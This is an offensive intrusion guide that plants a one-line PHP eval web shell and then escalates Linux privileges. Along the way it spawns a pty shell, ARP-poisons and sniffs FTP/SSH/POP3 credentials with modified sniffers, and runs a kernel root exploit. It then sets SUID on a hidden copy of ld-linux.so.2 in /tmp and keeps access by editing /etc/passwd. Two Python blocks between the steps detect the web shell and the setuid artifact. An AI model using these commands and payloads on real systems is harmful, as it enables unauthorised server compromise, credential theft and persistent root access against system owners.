Deploy a One‑Line PHP Backdoor and Escalate Linux Privileges
This guide shows how to plant a PHP backdoor, obtain an interactive shell, enumerate system information, compile and use network sniffers, modify source to capture credentials, and exploit Linux kernel and configuration weaknesses to achieve root access.
First, create a one‑line PHP backdoor on the target server:
echo -e "<?php @eval($_POST[md5])?>" > rankuplog_time.php
Verify the file:
cat rankuplog_time.php
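From the defender's side, the one-line web shell above is also the easiest kind to find: a tiny PHP file whose only content is an `eval()` (or `assert()`) over raw request input. The following scanner is an added example written for this page, not part of the original guide; it walks a web root, applies a small set of heuristic indicators (an assumption of mine, not an authoritative list), and reports which fired per file. The sample files it creates are constructed test data.

```python
import re
import tempfile
from pathlib import Path

# Constructed sample web root: the one-liner quoted in the guide, a benign page,
# and a file with a different risky pattern (request-controlled include).
SAMPLES = {
    "rankuplog_time.php": "<?php @eval($_POST[md5])?>",
    "index.php": "<?php\necho 'hello';\n",
    "helper.php": "<?php include($_GET['f']);\n",
}

# Heuristic indicators (assumed for this example). Each is a compiled regex
# that is matched against the raw file contents.
INDICATORS = {
    # eval()/assert() fed directly from a superglobal: the classic one-liner
    "eval_on_request": re.compile(
        r"@?\s*(eval|assert)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b", re.I),
    # command-execution family
    "exec_family": re.compile(
        r"\b(system|passthru|shell_exec|exec|popen|proc_open)\s*\(", re.I),
    # error suppression wrapped around eval, typical of drop-in shells
    "suppressed_eval": re.compile(r"@\s*eval\s*\(", re.I),
    # include/require controlled by request input
    "dynamic_include": re.compile(
        r"\b(include|require)(_once)?\s*\(?\s*\$_(GET|POST|REQUEST)", re.I),
}


def scan_php_text(text):
    """Return the list of indicator names that fire on one file's contents."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # A very short file that does nothing but evaluate request input is the
    # one-line backdoor pattern; call it out separately.
    if len(text) < 200 and "eval_on_request" in hits:
        hits.append("one_liner_size")
    return hits


def scan_webroot(root):
    """Walk `root` and return {relative_path: [indicators]} for PHP files with hits."""
    findings = {}
    for p in Path(root).rglob("*.php"):
        try:
            hits = scan_php_text(p.read_text(errors="replace"))
        except OSError:
            continue  # unreadable file: skip rather than abort the whole scan
        if hits:
            findings[str(p.relative_to(root))] = hits
    return findings


def demo():
    """Build the constructed web root in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as d:
        for name, body in SAMPLES.items():
            Path(d, name).write_text(body)
        return scan_webroot(d)


if __name__ == "__main__":
    for path, hits in demo().items():
        print(f"{path}: {', '.join(hits)}")
```

In practice this runs well as a periodic job over the web root, with findings compared against the previous run so that a newly appeared file with `eval_on_request` is the alert, not the static list.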
Use a Python one‑liner to spawn an interactive shell if Python is installed:
python -c 'import pty; pty.spawn("/bin/sh")'
Check the current user ID and kernel version:
id
uname -r
Linux privilege escalation techniques fall into three broad categories: vulnerabilities in third‑party software, abuse of local trust relationships, and kernel overflows. Search for appropriate exploits at sites such as http://tools.90sec.org/, http://sebug.net/paper/linux_exp/, http://x73.cc/bitch/exp/, and http://www.exploit-db.com/search/.
Compile and run a network sniffer (arpsniffer) after installing required libraries:
rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm
wget http://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz
tar zxvf libpcap-0.8.1.tar.gz && cd libpcap-0.8.1 && ./configure && make && make install
gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet
Run the sniffer to perform ARP poisoning and capture traffic:
./arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110
Capture the target’s packets with tcpdump and save them for analysis:
tcpdump -i eth0 host 192.168.0.11 -w pop.txt
Modify linsniffer.c to listen for specific service ports (e.g., FTP, SSH, Telnet, HTTP, POP3) and compile:
if(ntohs(tcp->dest)==21) p=1; /* ftp */
if(ntohs(tcp->dest)==22) p=1; /* ssh */
gcc -o linsniffer linsniffer.c
Run the compiled sniffer; captured usernames and passwords are stored in tcp.log:
./linsniffer
For systems where privilege escalation via the kernel is possible, use a local root exploit (e.g., udp_sendmsg for kernels ≤ 2.6.19) and set the SUID bit on a copied loader:
cp /lib/ld-linux.so.2 /tmp/.str1ven
chmod +s /tmp/.str1ven
Execute the loader to obtain a root shell:
./.str1ven $(which whoami)
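The persistence trick above leaves a very recognisable artifact: a setuid copy of the dynamic loader, with a hidden name, sitting in a world-writable directory. The audit below is an added example for this page (not the guide's code); it walks a tree, reports every setuid/setgid regular file, and attaches reasons that make it suspicious: a hidden name, a location under a temp directory, or content identical to a known system loader (matched by SHA-256 against a digest set the caller supplies). The demo creates constructed files in a temp dir, with a stand-in byte string in place of the real `ld-linux.so.2`.

```python
import hashlib
import os
import stat
import tempfile
from pathlib import Path

# Directories where a setuid file has no business being (assumed list).
TMP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")


def file_digest(path):
    """SHA-256 of a file's contents."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def classify_suid(path, st, known_loader_digests=frozenset()):
    """Return a list of reasons a file is suspicious; empty if not setuid/setgid."""
    reasons = []
    if not (st.st_mode & (stat.S_ISUID | stat.S_ISGID)):
        return reasons
    reasons.append("setuid" if st.st_mode & stat.S_ISUID else "setgid")
    if str(path).startswith(TMP_DIRS):
        reasons.append("in_tmp_dir")
    if path.name.startswith("."):
        reasons.append("hidden_name")
    if known_loader_digests and file_digest(path) in known_loader_digests:
        reasons.append("copy_of_loader")
    return reasons


def audit_suid(root, known_loader_digests=frozenset()):
    """Walk `root` and return {path: [reasons]} for setuid/setgid regular files."""
    findings = {}
    for p in Path(root).rglob("*"):
        try:
            st = p.lstat()  # lstat: do not follow symlinks into other trees
        except OSError:
            continue
        if not stat.S_ISREG(st.st_mode):
            continue
        reasons = classify_suid(p, st, known_loader_digests)
        if reasons:
            findings[str(p)] = reasons
    return findings


def demo():
    """Constructed tree: a loader stand-in, a setuid hidden copy of it, a normal script."""
    with tempfile.TemporaryDirectory() as d:
        loader = Path(d, "ld-linux.so.2")          # stand-in, not the real loader
        loader.write_bytes(b"\x7fELF-stand-in-loader")
        copy = Path(d, ".str1ven")                 # the artifact the guide creates
        copy.write_bytes(loader.read_bytes())
        os.chmod(copy, 0o4755)
        normal = Path(d, "helper")
        normal.write_bytes(b"#!/bin/sh\n")
        os.chmod(normal, 0o755)
        return audit_suid(d, {file_digest(loader)})


if __name__ == "__main__":
    for path, reasons in demo().items():
        print(f"{path}: {', '.join(reasons)}")
```

On a real host the digest set would be built from the loaders actually installed (`/lib/ld-linux.so.2`, `/lib64/ld-linux-x86-64.so.2` and the like) and the audit pointed at `/tmp`, `/var/tmp`, `/dev/shm` and user-writable web roots, where any setuid file at all is a finding.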
After gaining root, you can add a privileged user, edit /etc/passwd, or modify service configurations (e.g., enable SSH password authentication) to maintain access.